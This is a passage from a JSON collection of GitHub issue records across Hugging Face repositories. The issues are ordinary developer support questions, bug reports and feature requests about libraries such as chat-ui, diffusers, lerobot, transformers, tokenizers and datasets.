    "url": "https://github.com/huggingface/candle/issues/2269",
    "state": "open",
    "labels": [],
    "created_at": "2024-06-16T19:53:18Z",
    "updated_at": "2024-06-21T19:29:31Z",
    "user": "donkey-donkey"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1283,
    "title": "SELF_SIGNED_CERT_IN_CHAIN",
    "body": "I am experiencing this error. I'm on a corporate VPN and I tried turning it off and still the same error. The TLS reject is set to false as well.\r\n\r\nSELF_SIGNED_CERT_IN_CHAIN\u202871.61 \r\nnpm error errno SELF_SIGNED_CERT_IN_CHAIN\u202871.61 \r\nnpm error request to https://registry.npmjs.org/failed, reason: self-signed certificate in certificate chain",
    "url": "https://github.com/huggingface/chat-ui/issues/1283",
    "state": "open",
    "labels": [
      "support"
    ],
    "created_at": "2024-06-14T04:03:48Z",
    "updated_at": "2024-06-17T06:50:29Z",
    "comments": 2,
    "user": "solanki-aman"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 8527,
    "title": "how to add controlnet in sd3!",
    "body": "I currently use inpainting controlnet in sdxl because it uses unet to easily support controlnet. And I am curious about how to add controlnet in sd3 with transforms model structure.",
    "url": "https://github.com/huggingface/diffusers/issues/8527",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-13T10:14:38Z",
    "updated_at": "2024-08-24T04:20:28Z",
    "user": "appleyang123"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 266,
    "title": "Question - how to handle additional sensory input",
    "body": "Hi guys, sorry to bother you again :wink:  \r\nand thanks for your work, I'm very excited by Lerobot!\r\n\r\n\r\nI'm currently collecting some teleop data where the robot has tactile sensors on the fingertips, as well as a FT sensor on the wrist and I was wondering how I would integrate this best into a Lerobot Dataset.\r\n\r\nOne way would be to concatenate them into the `observation.state`, as this is the hardcoded location for non-image observations. But I want to train both with and without the tactile sensors and FT sensors as inputs to quantify the benefits of the other sensors, so I would then have to make separate datasets for each sensor combination which feels cumbersome. \r\n\r\nAre there any plans in the near future to support 'dynamic configuration' of the state inputs for the policies? Or is my best option to just create different datasets for each combination?\r\n\r\n\r\n",
    "url": "https://github.com/huggingface/lerobot/issues/266",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2024-06-13T08:39:26Z",
    "updated_at": "2025-10-23T02:29:29Z",
    "user": "tlpss"
  },
  {
    "repo": "huggingface/nanotron",
    "number": 196,
    "title": "how to run benchmark tests",
    "body": "Hi, \r\n\r\nI can build this project with your commands, but there is no \"pyaottriton\" when ran the benchmark test like: benchmark_forward.py or benchmark_backward.py.\r\n\r\nanything I missed?\r\n\r\nThanks",
    "url": "https://github.com/huggingface/nanotron/issues/196",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-13T08:31:06Z",
    "updated_at": "2024-06-13T08:38:24Z",
    "user": "jinsong-mao"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1277,
    "title": "Difficulties with chat-ui promp to text-generation-webui openai api endpoint",
    "body": "Hello,\r\n\r\nI'm trying my best to get the huggingface ```chat-ui``` working with the API endpoint of ```text-generation-webui```.\r\n\r\nI would be really happy if I could get a hint what I am doing wrong.\r\n\r\nHere is a reverse proxied test instance: https://chat-ui-test.pischem.com/\r\n\r\nI can't get my prompt that I input into the chat-ui to pass to the text-generation-webui. Every prompt will be ignored and a random answer is returned.\r\n\r\nHere is the command I start ```text-generation-webui```:\r\n\r\n
\r\n\r\n```./start_linux.sh --listen --listen-port 8000 --api --api-port 8001 --verbose --model NTQAI_Nxcode-CQ-7B-orpo```\r\n\r\n
\r\n\r\nHere is my current ```.local.env``` of the ```chat-ui``` and the command I run it with:\r\n\r\n
\r\n\r\n```npm run dev -- --host```\r\n\r\n```\r\nMODELS=`[\r\n {\r\n \"name\": \"text-generation-webui\",\r\n \"id\": \"text-generation-webui\",\r\n \"parameters\": {\r\n \"temperature\": 0.9,\r\n \"top_p\": 0.95,\r\n \"max_new_tokens\": 1024,\r\n \"stop\": []\r\n },\r\n \"endpoints\": [{\r\n \"type\" : \"openai\",\r\n \"baseURL\": \"http://172.16.0.169:8001/v1\",\r\n \"extraBody\": {\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 1000\r\n }\r\n }]\r\n }\r\n]`\r\n\r\nMONGODB_URL=`mongodb://localhost:27017`\r\nDEBUG=`true`\r\n```\r\n\r\n
\r\n\r\nHere are the logs what happen when I write a prompt:\r\n\r\n```chatui```:\r\n\r\n
\r\n\r\n```\r\n> chat-ui@0.9.1 dev\r\n> vite dev --host\r\n\r\n\r\n\r\n VITE v4.5.3 ready in 777 ms\r\n\r\n \u279c Local: http://localhost:5173/\r\n \u279c Network: http://172.16.0.135:5173/\r\n \u279c Network: http://172.17.0.1:5173/\r\n \u279c press h to show help\r\n(node:6250) [DEP0040] DeprecationWarning: The `punycode` module is deprecated. Please use a userland alternative instead.\r\n(Use `node --trace-deprecation ...` to show where the warning was created)\r\n[13:58:52.476] INFO (6250): [MIGRATIONS] Begin check...\r\n[13:58:52.478] INFO (6250): [MIGRATIONS] \"Update search assistants\" already applied. Skipping...\r\n[13:58:52.478] INFO (6250): [MIGRATIONS] \"Update deprecated models in assistants with the default model\" should not be applied for this run. Skipping...\r\n[13:58:52.478] INFO (6250): [MIGRATIONS] \"Add empty 'tools' record in settings\" already applied. Skipping...\r\n[13:58:52.478] INFO (6250): [MIGRATIONS] \"Convert message updates to the new schema\" already applied. Skipping...\r\n[13:58:52.478] INFO (6250): [MIGRATIONS] \"Convert message files to the new schema\" already applied. Skipping...\r\n[13:58:52.478] INFO (6250): [MIGRATIONS] \"Trim message updates to reduce stored size\" already applied. Skipping...\r\n[13:58:52.478] INFO (6250): [MIGRATIONS] All migrations applied. Releasing lock\r\n[13:58:52.498] INFO (6250): Metrics server listening on port 5565\r\nBrowserslist: caniuse-lite is outdated. Please run:\r\n npx update-browserslist-db@latest\r\n Why you should do it regularly: https://github.com/browserslist/update-db#readme\r\n\r\n\r\n(node:6250) Warning: To load an ES module, set \"type\": \"module\" in the package.json or use the .mjs extension.\r\n(node:6250) Warning: To load an ES module, set \"type\": \"module\" in the package.json or use the .mjs extension.\r\nSource path: /opt/chat-ui/src/lib/components/chat/FileDropzone.svelte?svelte&type=style&lang.css\r\nSetting up new context...\r\n\r\n\r\nSource path: /opt/chat-ui/src/lib/components/chat/ChatInput.svelte?svelte&type=style&lang.css\r\n\r\n\r\nSource path: /opt/chat-ui/src/lib/components/ToolsMenu.svelte?svelte&type=style&lang.css\r\n\r\n\r\nSource path: /opt/chat-ui/src/lib/components/chat/ChatMessage.svelte?svelte&type=style&lang.css\r\nJIT TOTAL: 265.317ms\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n(node:6250) Warning: Label 'JIT TOTAL' already exists for console.time()\r\n(node:6250) Warning: Label 'JIT TOTAL' already exists for console.time()\r\n(node:6250) Warning: Label 'JIT TOTAL' already exists for console.time()\r\n(node:6250) Warning: No such label 'JIT TOTAL' for console.timeEnd()\r\n(node:6250) Warning: No such label 'JIT TOTAL' for console.timeEnd()\r\n(node:6250) Warning: No such label 'JIT TOTAL' for console.timeEnd()\r\n\r\n\r\nSource path: /opt/chat-ui/src/lib/components/OpenWebSearchResults.svelte?svelte&type=style&lang.css\r\n\r\n\r\nSource path: /opt/chat-ui/src/lib/components/chat/ToolUpdate.svelte?svelte&type=style&lang.css\r\nJIT TOTAL: 1.355ms\r\n\r\n\r\n\r\n\r\n(node:6250) Warning: Label 'JIT TOTAL' already exists for console.time()\r\n(node:6250) Warning: No such label 'JIT TOTAL' for console.timeEnd()\r\n\r\n\r\nSource path: /opt/chat-ui/src/styles/main.css\r\nSetting up new context...\r\nFinding changed files: 8.775ms\r\nReading changed files: 158.906ms\r\nSorting candidates: 7.72ms\r\nGenerate rules: 397.398ms\r\nBuild stylesheet: 11.899ms\r\nPotential classes: 8755\r\nActive contexts: 2\r\nJIT TOTAL: 767.815ms\r\n\r\n\r\n\r\n\r\nSource path: /opt/chat-ui/src/styles/main.css?inline=\r\nSetting up new context...\r\nFinding changed files: 3.466ms\r\nReading changed files: 119.942ms\r\nSorting candidates: 7.852ms\r\nGenerate rules: 339.343ms\r\nBuild stylesheet: 6.497ms\r\nPotential classes: 8755\r\nActive contexts: 3\r\nJIT TOTAL: 635.226ms", "url": "https://github.com/huggingface/chat-ui/issues/1277", "state": "closed", "labels": [ "support" ], "created_at": "2024-06-12T14:18:12Z", "updated_at": "2025-01-30T18:46:22Z", "comments": 7, "user": "Monviech" }, { "repo": "huggingface/chat-ui", "number": 1275, "title": "Feature Request - support for session sharing, archiving, and collaboration", "body": "AFAIK, HuggingChat (HC) currently has no support for session sharing, archiving, and collaboration. At least, neither the HC server nor my GitHub (GH) searching found anything like this. So, if this doesn't exist, please consider how it could be implemented. For example, if I wanted to publish an HC session, maybe I could ask HC to send me a transcript in a form suitable for sharing (e.g., as a GH repo). To reduce friction, perhaps I could simply ask HC to create (or update) a repo.\r\n\r\nMaking it easy for HC users (and researchers) to examine and/or collaborate on sessions seems to me to be a Good Thing...", "url": "https://github.com/huggingface/chat-ui/issues/1275", "state": "open", "labels": [ "question" ], "created_at": "2024-06-12T11:35:31Z", "updated_at": "2024-06-14T05:24:08Z", "user": "RichMorin" }, { "repo": "huggingface/lerobot", "number": 263, "title": "Seeking advice on how to choose between ACT and DP algorithms", "body": "Hello,\r\n\r\nThank you very much for the work you have done in bringing together the current excellent imitation learning collections for convenient use. Regarding the ACT algorithm and DP algorithm, besides the basic differences in the algorithms themselves, how should one choose between them for different tasks? Do they have specific types of tasks they are particularly suited for? I have just started using your project and am unsure how to select the appropriate algorithm. I would greatly appreciate any advice you can provide.\r\n\r\nThank you!", "url": "https://github.com/huggingface/lerobot/issues/263", "state": "closed", "labels": [ "question" ], "created_at": "2024-06-12T07:45:39Z", "updated_at": "2024-06-19T14:02:43Z", "user": "le-wei" }, { "repo": "huggingface/dataset-viewer", "number": 2899, "title": "Standardize access to metrics and healthcheck", "body": "In some apps, the metrics and healthcheck are public:\r\n\r\n- https://datasets-server.huggingface.co/admin/metrics\r\n- https://datasets-server.huggingface.co/sse/metrics\r\n- https://datasets-server.huggingface.co/sse/healthcheck\r\n- https://datasets-server.huggingface.co/healthcheck\r\n- On others, it\u2019s forbidden or not found:\r\n\r\n- https://datasets-server.huggingface.co/metrics\r\n- https://datasets-server.huggingface.co/filter/metrics \r\n\r\nAs @severo suggests, it should be coherent among all the services. (Do we want the metrics to be public, or not?)\r\n", "url": "https://github.com/huggingface/dataset-viewer/issues/2899", "state": "open", "labels": [ "question", "infra", "P2" ], "created_at": "2024-06-11T14:39:10Z", "updated_at": "2024-07-11T15:38:17Z", "user": "AndreaFrancis" }, { "repo": "huggingface/lerobot", "number": 261, "title": "Which low cost robot with teleoperation to test the library ?", "body": "Firstly, thank you for all the work. At my company we would like to obtain results on real robots from this repository. However, the original setups are either quite expensive (around ~30k for Aloha) or require reconstruction for the UMI interface from Colombia via 3D printing, which would be time-consuming considering we don't have direct experience in the subject.\r\n\r\n**Do you have any recommendations for one or more robots with a low-cost teleoperation setup on which we could test and iterate quickly on these algorithms?** I have seen some people doing things with low-cost robots on LinkedIn, and I will reach out to them, but apparently, they do not seem to be selling them.\r\n\r\nThanks,", "url": "https://github.com/huggingface/lerobot/issues/261", "state": "closed", "labels": [ "question" ], "created_at": "2024-06-11T13:21:32Z", "updated_at": "2024-07-23T07:55:15Z", "user": "RochMollero" }, { "repo": "huggingface/diarizers", "number": 11, "title": "How can I save the model locally before pushing it to the Hub ?!", "body": "", "url": "https://github.com/huggingface/diarizers/issues/11", "state": "closed", "labels": [], "created_at": "2024-06-11T06:37:45Z", "updated_at": "2024-06-13T16:24:19Z", "user": "ma-mohsen" }, { "repo": "huggingface/parler-tts", "number": 68, "title": "How to predict after finetune? There is no config.json in checkpoint dir.", "body": "", "url": "https://github.com/huggingface/parler-tts/issues/68", "state": "open", "labels": [], "created_at": "2024-06-11T03:30:04Z", "updated_at": "2024-06-17T01:57:04Z", "user": "lyt719" }, { "repo": "huggingface/transformers.js", "number": 802, "title": "Long running transcription using webgpu-whisper", "body": "### Question\r\n\r\nNoob question - the [webgpu-whisper](https://github.com/xenova/transformers.js/tree/v3/examples/webgpu-whisper) demo does real time transcription, however it doesn't build out a full transcript from the start ie. 2 mins into transcription, the first few transcribed lines disappear. \r\n\r\nTranscript at time x \ud83d\udc47 \r\n```\r\nCool, let's test this out. We'll see how this works. So turns out that the transcription when I try to access it is actually just empty. And so the only thing that actually comes through is. So yeah, so the output that's getting cut is basically coming from the\r\n```\r\n\r\nTranscript at time x+1 \ud83d\udc47 \r\n```\r\nthis out, we'll see how this works. So turns out that the transcription when I try to access it is actually just empty. And so the only thing that actually comes through is. So yeah, so the output that's getting cut is basically coming from the work\r\n```\r\n\r\nNote how the \"Cool, let's test\" is missing from the start of the second transcript. \r\n\r\nI'm wondering what it would take to keep building the transcript for a long running meeting without losing any of the previously transcribed stuff? \r\n\r\nI tried a naive appending approach and that just results in a transcript full of repetition. \r\n\r\nSo I'm very curious about what it would take to build out a streaming transcription similar to what something like [Deepgram](https://developers.deepgram.com/docs/node-sdk-streaming-transcription) would offer. Would that require a change to the pipeline? Are there models that can take an appended transcript with lots of repetition and trim it down to a clean transcript?\r\n\r\nPlease let me know if my questions are unclear. Just looking for some direction so that I can potentially put up a PR for this (if needed).\r\n", "url": "https://github.com/huggingface/transformers.js/issues/802", "state": "open", "labels": [ "question" ], "created_at": "2024-06-10T16:44:01Z", "updated_at": "2025-05-30T05:52:37Z", "user": "iamhitarth" }, { "repo": "huggingface/sentence-transformers", "number": 2738, "title": "How is `max_length` taken into account compared to models setting", "body": "What happens under the hood, if I set max_length > than model's max_length?\r\n\r\n\r\nit seems to work, but are inputs truncated or doi you apply RoPE-Extension?", "url": "https://github.com/huggingface/sentence-transformers/issues/2738", "state": "open", "labels": [], "created_at": "2024-06-09T15:59:09Z", "updated_at": "2024-06-10T06:45:49Z", "user": "l4b4r4b4b4" }, { "repo": "huggingface/datasets", "number": 6961, "title": "Manual downloads should count as downloads", "body": "### Feature request\n\nI would like to request that manual downloads of data files from Hugging Face dataset repositories count as downloads of a dataset. According to the documentation for the Hugging Face Hub, that is currently not the case: https://huggingface.co/docs/hub/en/datasets-download-stats\n\n### Motivation\n\nThis would ensure that downloads are accurately reported to end users.\n\n### Your contribution\n\nN/A", "url": "https://github.com/huggingface/datasets/issues/6961", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-06-09T04:52:06Z", "updated_at": "2024-06-13T16:05:00Z", "comments": 1, "user": "umarbutler" }, { "repo": "huggingface/diffusers", "number": 8439, "title": "How to use EDM2 model with diffusers?", "body": "model safetensors: https://huggingface.co/RedRocket/Fluffyrock-Unbound/blob/main/Fluffyrock-Unbound-v1-1.safetensors\r\nyaml: https://huggingface.co/RedRocket/Fluffyrock-Unbound/raw/main/Fluffyrock-Unbound-v1-1.yaml\r\n\r\ncolab demo:\r\n\r\nhttps://colab.research.google.com/drive/1LSGvjWXNVjs6Tthcpf0F5VwuTFJ_d-oB\r\n\r\nresults:\r\n\r\n![Untitled](https://github.com/huggingface/diffusers/assets/151509142/50df4aae-cf88-436d-a76f-c25bda0f7e76)\r\n", "url": "https://github.com/huggingface/diffusers/issues/8439", "state": "open", "labels": [ "stale" ], "created_at": "2024-06-09T03:39:05Z", "updated_at": "2024-09-14T15:10:19Z", "user": "s9anus98a" }, { "repo": "huggingface/transformers", "number": 31323, "title": "Language modeling examples do not show how to do multi-gpu training / fine-tuning", "body": "### System Info\r\n\r\n- `transformers` version: 4.41.2\r\n- Platform: Linux-5.15.0-1042-nvidia-x86_64-with-glibc2.35\r\n- Python version: 3.9.18\r\n- Huggingface_hub version: 0.23.3\r\n- Safetensors version: 0.4.2\r\n- Accelerate version: 0.31.0\r\n- Accelerate config: \tnot found\r\n- PyTorch version (GPU?): 2.2.1+cu121 (True)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n\r\n\r\n### Who can help?\r\n\r\n@muellerz @stevhliu \r\n\r\n### Information\r\n\r\n- [X] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [X] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\nn/a\r\n\r\n### Expected behavior\r\n\r\nThe `run_clm.py` and other related scripts in:\r\n\r\n`https://github.com/huggingface/transformers/tree/main/examples/pytorch/language-modeling`\r\n\r\nnotionally support training / fine-tuning of models whose gradients are too large to fit on a single GPU, if you believe their CLI. However there is no example showing how to actually do that.\r\n\r\nFor instance, `accelerate estimate-memory` says training the Mistral-7B family with Adam takes roughly 55 GB with float16, which is more memory than a single 40GB A100 has. So I'd need to use more than one GPU.\r\n\r\nWould it be possible to modify the language_modeling documentation to explain how to do that?\r\n\r\n", "url": "https://github.com/huggingface/transformers/issues/31323", "state": "closed", "labels": [ "Documentation" ], "created_at": "2024-06-07T18:49:35Z", "updated_at": "2024-12-02T08:11:31Z", "user": "csiefer2" }, { "repo": "huggingface/candle", "number": 2258, "title": "How to Implement New Operators Using CUDA Host Functions Along with Thrust and CUB Libraries", "body": "As stated, the CUDA code in the candle-kernels repository seems to only contain kernel functions. When I want to implement new operators (such as nonzero), it seems I'm only able to use Rust for higher-level functionality, which means I cannot utilize the device_vector from Thrust or the flagged APIs from CUB. This poses a significant challenge for implementing my algorithms. For example, to implement nonzero, it seems I would have to reimplement algorithms like exclusive_scan and scatter using the current approach?\r\n\r\nI am hoping for a better way to utilize the CUDA ecosystem!\r\n\r\nSpecifically, I'm interested in how to:\r\n\r\n1. Incorporate host functions in CUDA code to facilitate the use of libraries like Thrust and CUB.\r\n2. Effectively leverage these libraries to implement algorithms and operators that are not natively supported in the current codebase.\r\nAny guidance or best practices for achieving this would be greatly appreciated.\r\n(Translate from Chinese using LLM, Might be a little bit.. formal^_^)", "url": "https://github.com/huggingface/candle/issues/2258", "state": "open", "labels": [], "created_at": "2024-06-07T16:52:44Z", "updated_at": "2024-06-09T15:56:36Z", "user": "chenwanqq" }, { "repo": "huggingface/text-generation-inference", "number": 2035, "title": "What is TGI's graceful shutdown behavior?", "body": "When SIGKILL arrives, \r\n\r\n- does TGI process all pending inputs?\r\n- does TGI blocks incoming inputs?\r\n\r\nI saw a PR that adds graceful shutdown but it did not specify the exact program behavior. ", "url": "https://github.com/huggingface/text-generation-inference/issues/2035", "state": "closed", "labels": [], "created_at": "2024-06-07T06:24:00Z", "updated_at": "2024-06-07T08:08:51Z", "user": "seongminp" }, { "repo": "huggingface/tokenizers", "number": 1549, "title": "How to use `TokenizerBuilder`?", "body": "I expected `TokenizerBuilder` to produce a `Tokenizer` from the `build()` result, but instead `Tokenizer` wraps `TokenizerImpl`.\r\n\r\nNo problem, I see that it impl `From for Tokenizer`, but it's attempting to do quite a bit more for some reason? Meanwhile I cannot use `Tokenizer(unwrapped_build_result_here)` as the struct is private \ud83e\udd14 (_while the `Tokenizer::new()` method won't take this in either_)\r\n\r\n---\r\n\r\n```rs\r\nlet mut tokenizer = Tokenizer::from(TokenizerBuilder::new()\r\n .with_model(unigram)\r\n .with_decoder(Some(decoder))\r\n .with_normalizer(Some(normalizer))\r\n .build()\r\n .map_err(anyhow::Error::msg)?\r\n);\r\n```\r\n\r\n```rs\r\nerror[E0283]: type annotations needed\r\n --> mistralrs-core/src/pipeline/gguf_tokenizer.rs:139:41\r\n |\r\n139 | let mut tokenizer = Tokenizer::from(TokenizerBuilder::new()\r\n | ^^^^^^^^^^^^^^^^^^^^^ cannot infer type of the type parameter `PT` declared on the struct `TokenizerBuilder`\r\n |\r\n = note: cannot satisfy `_: tokenizers::PreTokenizer`\r\n = help: the following types implement trait `tokenizers::PreTokenizer`:\r\n tokenizers::pre_tokenizers::bert::BertPreTokenizer\r\n tokenizers::decoders::byte_level::ByteLevel\r\n tokenizers::pre_tokenizers::delimiter::CharDelimiterSplit\r\n tokenizers::pre_tokenizers::digits::Digits\r\n tokenizers::decoders::metaspace::Metaspace\r\n tokenizers::pre_tokenizers::punctuation::Punctuation\r\n tokenizers::pre_tokenizers::sequence::Sequence\r\n tokenizers::pre_tokenizers::split::Split\r\n and 4 others\r\nnote: required by a bound in `tokenizers::TokenizerBuilder::::new`\r\n --> /root/.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokenizers-0.19.1/src/tokenizer/mod.rs:314:9\r\n |\r\n314 | PT: PreTokenizer,\r\n | ^^^^^^^^^^^^ required by this bound in `TokenizerBuilder::::new`\r\n...\r\n319 | pub fn new() -> Self {\r\n | --- required by a bound in this associated function\r\nhelp: consider specifying the generic arguments\r\n |\r\n139 | let mut tokenizer = Tokenizer::from(TokenizerBuilder::::new()\r\n | +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n```\r\n\r\nWhy is this an issue? Isn't the point of the builder so that you don't have to specify the optional types not explicitly set?\r\n\r\n> ```\r\n> cannot infer type of the type parameter `PT` declared on the struct `TokenizerBuilder`\r\n> ```\r\n\r\nI had a glance over the source on github but didn't see an example or test for using this API and the docs don't really cover it either.\r\n\r\n---\r\n\r\nMeanwhile with `Tokenizer` instead of `TokenizerBuilder` this works:\r\n\r\n```rs\r\nlet mut tokenizer = Tokenizer::new(tokenizers::ModelWrapper::Unigram(unigram));\r\ntokenizer.with_decoder(decoder);\r\ntokenizer.with_normalizer(normalizer);\r\n```\r\n", "url": "https://github.com/huggingface/tokenizers/issues/1549", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-06-07T01:18:07Z", "updated_at": "2024-07-20T01:52:03Z", "user": "polarathene" }, { "repo": "huggingface/transformers.js", "number": 796, "title": "No performance gain on using WebGPU", "body": "### Question\n\nI want to use the model: https://huggingface.co/Xenova/clip-vit-large-patch14 with WebGPU for quick inference in the browser. I ran the WebGPU benchmark to observe the performance increase and indeed it showed a ~7x improvement in speed on my device.\r\n\r\nBut when I run the clip model linked above, there's barely any difference between performance with and without WebGPU.", "url": "https://github.com/huggingface/transformers.js/issues/796", "state": "closed", "labels": [ "question" ], "created_at": "2024-06-06T20:16:07Z", "updated_at": "2024-06-09T01:44:17Z", "user": "mr-sarthakgupta" }, { "repo": "huggingface/optimum", "number": 1895, "title": "Lift upper version limit of transformers for habana", "body": "### Feature request\n\noptimium currently limits transformers to `>= 4.38.0, < 4.39.0`. @regisss bumped the upper version limit in PR #1851 a month ago. Is there any technical reason to limit the upper version to `< 4.39`? Other dependencies allow for more recent versions. For example neuronx allows `< 4.42.0`, see #1881.\n\n### Motivation\n\nWe would like to use newer versions of transformers and tokenizers in InstructLab. The upper version limit for optimum makes this harder on us. We need optimum-habana for Intel Gaudi support.\n\n### Your contribution\n\nI can create a PR. It's a trivial one line change.\r\n\r\nTesting is less trivial. I have access to an 8-way Gaudi 2 system, but the system is currently busy. I can do some testing in about two weeks from now after I have updated the system from 1.15.1 to 1.16.0.", "url": "https://github.com/huggingface/optimum/issues/1895", "state": "closed", "labels": [], "created_at": "2024-06-06T07:52:41Z", "updated_at": "2024-06-24T08:53:27Z", "comments": 4, "user": "tiran" }, { "repo": "huggingface/peft", "number": 1829, "title": "How to change to PEFT model dynamically?", "body": "python==3.7.12\r\nPEFT==0.3.0\r\n\r\n@BenjaminBossan \r\n\r\nI fine-tune the eleventh transformer of Bert as below:\r\n\r\n```bash\r\ntarget_modules = []\r\ntarget_modules.append(\"11.attention.self.query\")\r\ntarget_modules.append(\"11.attention.self.value\")\r\n\r\nlora_config = LoraConfig(\r\n r = self.args.lora_rank,\r\n lora_alpha = self.args.lora_alpha,\r\n target_modules = target_modules,\r\n lora_dropout = 0.05,\r\n bias = \"none\"\r\n)\r\n```\r\n\r\nAfter training for a few epochs, I also want to fine-tune the first transformer. How to achieve this?\r\n\r\n", "url": "https://github.com/huggingface/peft/issues/1829", "state": "closed", "labels": [], "created_at": "2024-06-05T13:24:40Z", "updated_at": "2024-06-06T00:37:06Z", "user": "whr819987540" }, { "repo": "huggingface/transformers.js", "number": 792, "title": "Feature request: YOLO-World/Grounding DINO (Zero shot object detection)", "body": "### Question\n\nHi!\r\n\r\nI'm trying out some of the zero shot capabilities and I've been working with the owlv2 but I was wondering, is support for yolo-world and grounding Dino coming? They seem to be faster than owlv2.\r\n\r\nThanks!", "url": "https://github.com/huggingface/transformers.js/issues/792", "state": "open", "labels": [ "question" ], "created_at": "2024-06-04T21:39:18Z", "updated_at": "2024-06-24T07:04:27Z", "user": "rogueturnip" }, { "repo": "huggingface/transformers.js", "number": 791, "title": "env.allowLocalModels and env.allowRemoteModels", "body": "### Question\n\nWhen I set env.allowLocalModels = true and look at the env object I see both \r\nenv.allowLocalModels and env.allowRemoteModels set to true. Does this mean that it will look for models locally first and then if not found go to the remoteHost? ", "url": "https://github.com/huggingface/transformers.js/issues/791", "state": "open", "labels": [ "question" ], "created_at": "2024-06-04T17:07:38Z", "updated_at": "2024-09-15T14:00:48Z", "user": "mram0509" }, { "repo": "huggingface/diffusers", "number": 8400, "title": "how can we load model to lora from singlefile ? ", "body": " pipe.load_lora_weights(\"lora/aesthetic_anime_v1s.safetensors\")\r\n File \"Z:\\software\\python11\\Lib\\site-packages\\diffusers\\loaders\\lora.py\", line 1230, in load_lora_weights\r\n raise ValueError(\"PEFT backend is required for this method.\")\r\nValueError: PEFT backend is required for this method.\r\n\r\npipe.load_lora_weights(\"lora/aesthetic_anime_v1s.safetensors\")\r\n\r\nhow can i use this model https://civitai.com/models/295100?modelVersionId=331598\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/8400", "state": "closed", "labels": [], "created_at": "2024-06-04T13:54:56Z", "updated_at": "2024-06-04T15:53:32Z", "user": "xalteropsx" }, { "repo": "huggingface/datasets", "number": 6953, "title": "Remove canonical datasets from docs", "body": "Remove canonical datasets from docs, now that we no longer have canonical datasets.", "url": "https://github.com/huggingface/datasets/issues/6953", "state": "closed", "labels": [ "documentation" ], "created_at": "2024-06-04T12:09:03Z", "updated_at": "2024-07-01T11:31:25Z", "comments": 1, "user": "albertvillanova" }, { "repo": "huggingface/datasets", "number": 6951, "title": "load_dataset() should load all subsets, if no specific subset is specified", "body": "### Feature request\n\nCurrently load_dataset() is forcing users to specify a subset. Example\r\n\r\n`from datasets import load_dataset\r\ndataset = load_dataset(\"m-a-p/COIG-CQIA\")`\r\n\r\n```---------------------------------------------------------------------------\r\nValueError Traceback (most recent call last)\r\n[](https://localhost:8080/#) in ()\r\n 1 from datasets import load_dataset\r\n----> 2 dataset = load_dataset(\"m-a-p/COIG-CQIA\")\r\n\r\n3 frames\r\n[/usr/local/lib/python3.10/dist-packages/datasets/builder.py](https://localhost:8080/#) in _create_builder_config(self, config_name, custom_features, **config_kwargs)\r\n 582 if not config_kwargs:\r\n 583 example_of_usage = f\"load_dataset('{self.dataset_name}', '{self.BUILDER_CONFIGS[0].name}')\"\r\n--> 584 raise ValueError(\r\n 585 \"Config name is missing.\"\r\n 586 f\"\\nPlease pick one among the available configs: {list(self.builder_configs.keys())}\"\r\n\r\nValueError: Config name is missing.\r\nPlease pick one among the available configs: ['chinese_traditional', 'coig_pc', 'exam', 'finance', 'douban', 'human_value', 'logi_qa', 'ruozhiba', 'segmentfault', 'wiki', 'wikihow', 'xhs', 'zhihu']\r\nExample of usage:\r\n\t`load_dataset('coig-cqia', 'chinese_traditional')`\r\n```\r\nThis means a dataset cannot contain all the subsets at the same time. I guess one workaround is to manually specify the subset files like in [here](https://huggingface.co/datasets/m-a-p/COIG-CQIA/discussions/1#658698b44bb41498f75c5622), which is clumsy.\r\n\r\n\r\n\n\n### Motivation\n\nIdeally, if not subset is specified, the API should just try to load all subsets. This makes it much easier to handle datasets w/ subsets.\n\n### Your contribution\n\nNot sure since I'm not familiar w/ the lib src.", "url": "https://github.com/huggingface/datasets/issues/6951", "state": "closed", "labels": [ "enhancement" ], "created_at": "2024-06-04T11:02:33Z", "updated_at": "2024-11-26T08:32:18Z", "comments": 5, "user": "windmaple" }, { "repo": "huggingface/datasets", "number": 6950, "title": "`Dataset.with_format` behaves inconsistently with documentation", "body": "### Describe the bug\n\nThe actual behavior of the interface `Dataset.with_format` is inconsistent with the documentation.\r\nhttps://huggingface.co/docs/datasets/use_with_pytorch#n-dimensional-arrays\r\nhttps://huggingface.co/docs/datasets/v2.19.0/en/use_with_tensorflow#n-dimensional-arrays\r\n\r\n> If your dataset consists of N-dimensional arrays, you will see that by default they are considered as nested lists.\r\n> In particular, a PyTorch formatted dataset outputs nested lists instead of a single tensor.\r\n> A TensorFlow formatted dataset outputs a RaggedTensor instead of a single tensor.\r\n\r\nBut I get a single tensor by default, which is inconsistent with the description.\r\n\r\nActually the current behavior seems more reasonable to me. Therefore, the document needs to be modified.\n\n### Steps to reproduce the bug\n\n```python\r\n>>> from datasets import Dataset\r\n>>> data = [[[1, 2],[3, 4]],[[5, 6],[7, 8]]]\r\n>>> ds = Dataset.from_dict({\"data\": data})\r\n>>> ds = ds.with_format(\"torch\")\r\n>>> ds[0]\r\n{'data': tensor([[1, 2],\r\n [3, 4]])}\r\n>>> ds = ds.with_format(\"tf\")\r\n>>> ds[0]\r\n{'data': }\r\n```\n\n### Expected behavior\n\n```python\r\n>>> from datasets import Dataset\r\n>>> data = [[[1, 2],[3, 4]],[[5, 6],[7, 8]]]\r\n>>> ds = Dataset.from_dict({\"data\": data})\r\n>>> ds = ds.with_format(\"torch\")\r\n>>> ds[0]\r\n{'data': [tensor([1, 2]), tensor([3, 4])]}\r\n>>> 